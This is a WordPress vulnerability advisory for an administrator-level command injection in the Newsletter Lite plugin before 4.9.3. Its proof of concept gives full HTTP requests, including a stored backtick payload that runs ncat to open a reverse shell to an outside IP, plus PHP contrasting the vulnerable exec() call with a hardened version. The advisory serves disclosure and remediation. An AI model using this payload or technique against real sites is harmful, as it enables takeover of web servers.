WordPress Plugin Vulnerabilities

Newsletter Lite < 4.9.3 - Admin+ Command Injection

Description

The plugin does not properly escape user-controlled parameters before appending them to SQL queries and shell commands. In the case shown below, the value an administrator saves in the "Archive Older Than" setting is later concatenated into a shell command and executed, so an authenticated administrator can run arbitrary OS commands on the web server. Administrator privileges are required, but this still matters on hardened installs: constants such as DISALLOW_FILE_MODS stop administrators from uploading plugins or editing PHP files, and a command-injection sink in a settings page bypasses that restriction.

Proof of Concept

[1] Navigate to "Newsletters > Configuration > History & Emails Configuration"

======================

[2] Submit the RCE payload in the "Archive Older Than" field and save the settings. The payload travels in the HTTP parameter "emailarchive_olderthan" and is wrapped in backticks in the form ` <PAYLOAD> `#, as shown below. The backticks are shell command substitution: when the plugin's command line is later handed to the shell, <PAYLOAD> is executed first, regardless of whether the outer command then succeeds with the substituted result. The trailing # is there to neutralise whatever the plugin appends after the value (it acts as a comment when the shell sees it at the start of a word).

POST /wp-admin/admin.php?page=newsletters-settings HTTP/1.1
Host: 192.168.178.130
Content-Length: 13688
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.178.130
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5lVCjZQhpa9vBS0n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

-- SNIP --

------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="emailarchive_olderthan"

` ncat 192.168.1.127 -e /bin/bash `#
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="theme_folder"

default2
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="loadstyles[]"

newsletters-bootstrap
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="loadstyles_handles[newsletters-bootstrap]"

-- SNIP --

======================

[3] Trigger the payload by navigating to Newsletters > Configuration > Scheduled Tasks > Email Archiving, then click "Run Now". This issues the GET request below, which runs the newsletters_emailarchivehook task immediately; because the payload is stored as a setting, it fires every time that task runs, not only on the manual trigger:

GET /wp-admin/admin.php?page=newsletters-settings-tasks&method=runschedule&hook=newsletters_emailarchivehook HTTP/1.1
Host: 192.168.178.130
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings-tasks&wpmlupdated=true&wpmlmessage=Task+has+been+executed+successfully%21
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

======================

[4] The stored value is then passed unsanitised into a shell command executed via PHP's exec() function, resulting in arbitrary command execution as the web server user.
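The following PHP is an added illustration of the vulnerable pattern the four steps above describe, placed beside a hardened form. It is not the plugin's source: the find(1) command, the archive path and the function names are stand-ins, since the advisory only states that the stored setting reaches exec() unsanitised. The sample payload keeps the PoC's ` <PAYLOAD> `# shape but writes a marker file instead of spawning a reverse shell.

```php
<?php
// Added illustration, not the plugin's source. The find(1) command, the
// archive path and the function names are assumptions; the advisory only
// says the "Archive Older Than" setting reaches exec() without sanitising.

// Constructed sample of a stored "emailarchive_olderthan" value in the
// PoC's shape ` <PAYLOAD> `#, with a harmless marker-file write standing
// in for the reverse shell. sys_get_temp_dir() keeps the demo portable.
$marker  = sys_get_temp_dir() . '/newsletters_poc_marker';
$payload = '` id > ' . $marker . ' `#';

// Vulnerable pattern: the option value is concatenated verbatim into a
// shell command line. The shell performs the backtick command substitution
// while assembling the argument, so the injected command runs before find
// is even started. find then fails on the mangled argument (its complaint
// goes to stderr), but by that point the payload has already executed.
function archive_vulnerable(string $olderthan): array
{
    $cmd = 'find /tmp/archive -type f -mtime +' . $olderthan . ' -print';
    exec($cmd, $out, $rc);
    return ['cmd' => $cmd, 'rc' => $rc];
}

// Hardened pattern: the setting is a number of days, so accept nothing but
// a bounded non-negative integer. WordPress code would typically use
// absint(); filter_var() keeps this file runnable outside WordPress. The
// validated value still goes through escapeshellarg() as defence in depth.
function archive_hardened(string $olderthan): array
{
    $days = filter_var($olderthan, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 3650]]);
    if ($days === false) {
        throw new InvalidArgumentException(
            'emailarchive_olderthan must be an integer between 0 and 3650');
    }
    $cmd = 'find /tmp/archive -type f -mtime +'
         . escapeshellarg((string) $days) . ' -print';
    exec($cmd, $out, $rc);
    return ['cmd' => $cmd, 'rc' => $rc];
}

@unlink($marker);
$r = archive_vulnerable($payload);
printf("vulnerable: %s\n  marker written: %s\n", $r['cmd'],
    file_exists($marker) ? 'yes (injected command ran)' : 'no');

try {
    archive_hardened($payload);
} catch (InvalidArgumentException $e) {
    printf("hardened:   rejected payload (%s)\n", $e->getMessage());
}
$r = archive_hardened('30');
printf("hardened:   %s\n", $r['cmd']);
@unlink($marker);
```

Run it with the PHP CLI on a host where find(1) is available: the vulnerable path leaves the marker file behind even though find itself exits non-zero, which is why a failing outer command is no evidence that an exec() sink is safe. The hardened path rejects the payload outright and, for a legitimate value, only ever hands the shell a quoted integer.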

Affects Plugins

Fixed in 4.9.3

References

Classification

Type
COMMAND INJECTION
OWASP top 10
CWE

Miscellaneous

Original Researcher
Karolis Narvilas
Submitter
Karolis Narvilas
Submitter website
Verified
Yes

Timeline

Publicly Published
2023-10-05
Added
2023-10-05
Last Updated
2023-10-05